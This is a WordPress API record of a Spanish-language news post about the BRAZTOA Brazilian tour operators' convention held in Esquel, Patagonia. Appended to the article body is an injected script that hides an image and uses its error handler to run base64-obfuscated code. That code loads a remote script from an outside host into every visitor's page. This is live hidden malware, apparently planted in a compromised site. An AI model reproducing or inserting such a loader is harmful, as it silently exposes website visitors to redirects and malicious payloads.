{"id":8792,"date":"2024-10-09T11:40:25","date_gmt":"2024-10-09T14:40:25","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8792"},"modified":"2025-08-13T15:37:30","modified_gmt":"2025-08-13T18:37:30","slug":"finalizo-con-exito-la-convencion-braztoa-en-esquel","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8792","title":{"rendered":"FINALIZ\u00d3 CON \u00c9XITO LA CONVENCI\u00d3N BRAZTOA EN ESQUEL"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-abfbecc4cd7939b181bf95551dc7c869\" style=\"background-color:#035189\"><em>Del 2 al 6 de octubre, la ciudad de la provincia de Chubut vivi\u00f3 cinco jornadas muy productivas junto a los principales operadores tur\u00edsticos de Brasil.<\/em><\/h3>\n\n\n\n<p>En un hecho hist\u00f3rico para la provincia de\u00a0<strong>Chubut<\/strong>\u00a0y para\u00a0<strong>Esquel<\/strong>\u00a0-ciudad ubicada al oeste provincial, frente a la Cordillera de los Andes-, en este rinc\u00f3n de la Patagonia, del 2 al 6 de octubre, se llev\u00f3 a cabo la\u00a0<strong>35\u00aa Convenci\u00f3n Anual de la Asociaci\u00f3n Brasile\u00f1a de Operadores de Turismo (BRAZTOA)<\/strong>.<\/p>\n\n\n\n<p>Durante cinco jornadas, los principales operadores tur\u00edsticos de Brasil pudieron conocer a fondo la oferta tur\u00edstica de Esquel, una ciudad que es la base para visitar incre\u00edbles lugares como el\u00a0<strong>Parque Nacional Los Alerces<\/strong>\u00a0(Patrimonio de la Humanidad), el centro de esqu\u00ed\u00a0<strong>La Hoya<\/strong>\u00a0y\u00a0<strong>Trevelin<\/strong>, un encantador pueblo con aires galeses.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci3.googleusercontent.com\/meips\/ADKq_NY65yKXU7ybyAUWLTPKHeiqmqMpsx0gjhDFIUWPnl3scA_l-3M8K-EBirT_X_nbP0_HKL0OQ5UyiMjcMX6q6I_WNEr6WlYpcya8k_BxPsQvdVMn4c3d9FJ_5lXkau4gfOTt5R2r30BOKKzKosJ8EUU1BUY=s0-d-e1-ft#https:\/\/8igee.img.ag.d.sendibm3.com\/im\/sh\/Sb74JHUeMgwS.png?u=WtVElij8PJZGdKGyxzLueelIaF2Fvf7s\" alt=\"\" \/><\/figure>\n\n\n\n<p>En este sentido, para el segmento&nbsp;<strong>nieve<\/strong>, por citar uno de los productos a vender, la cita se torn\u00f3 fundamental para que los operadores comprueben la calidad de La Hoya y as\u00ed puedan comercializar con mayor facilidad una variante de dicho producto.<\/p>\n\n\n\n<p>El encuentro fue muy valorado por los miembros de Braztoa (<strong>CVC, Orinter, BRT y Bancobr\u00e1s&nbsp;<\/strong>fueron algunas de las grandes compa\u00f1\u00edas presentes), quienes manifestaron un fuerte entusiasmo en comercializar la oferta de un destino que los brasile\u00f1os deber\u00edan conocer. El objetivo, con este tipo de acciones, es que Esquel se posiciones en un mediano y largo plazo como una plaza tur\u00edstica entre los viajeros de Brasil.<\/p>\n\n\n\n<p>La realizaci\u00f3n de la Convenci\u00f3n cont\u00f3 con el apoyo y el respaldo de la Secretar\u00eda de Turismo, Ambiente y Deportes de la Naci\u00f3n, el Instituto Nacional de Promoci\u00f3n Tur\u00edstica (INPROTUR), el ministerio de Turismo y \u00c1reas Protegidas del Chubut, la ciudad de Esquel y de entidades p\u00fablicas y privadas.<\/p>\n<p>\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/8igee.r.ag.d.sendibm3.com\/mk\/cl\/f\/sh\/1t6Af4OiGsDg0mBEP90G4lcfJ9HXS0\/x5nLLBz4rHDe\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"205\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-1024x205.jpg\" alt=\"\" class=\"wp-image-8793\" style=\"width:481px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-1024x205.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-300x60.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-768x154.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-1536x307.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-2048x410.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-696x139.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-1068x214.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-320x64.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-480x96.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/10\/unnamed-800x160.jpg 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Del 2 al 6 de octubre, la ciudad de la provincia de Chubut vivi\u00f3 cinco jornadas muy productivas junto a los principales operadores tur\u00edsticos de Brasil. En un hecho hist\u00f3rico para la provincia de\u00a0Chubut\u00a0y para\u00a0Esquel\u00a0-ciudad ubicada al oeste provincial, frente a la Cordillera de los Andes-, en este rinc\u00f3n de la Patagonia, del 2 al [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8794,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31,29,21],"tags":[],"class_list":["post-8792","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboradores","category-datos-utiles","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8792","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8792"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8792\/revisions"}],"predecessor-version":[{"id":10066,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8792\/revisions\/10066"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8794"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8792"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8792"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8792"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}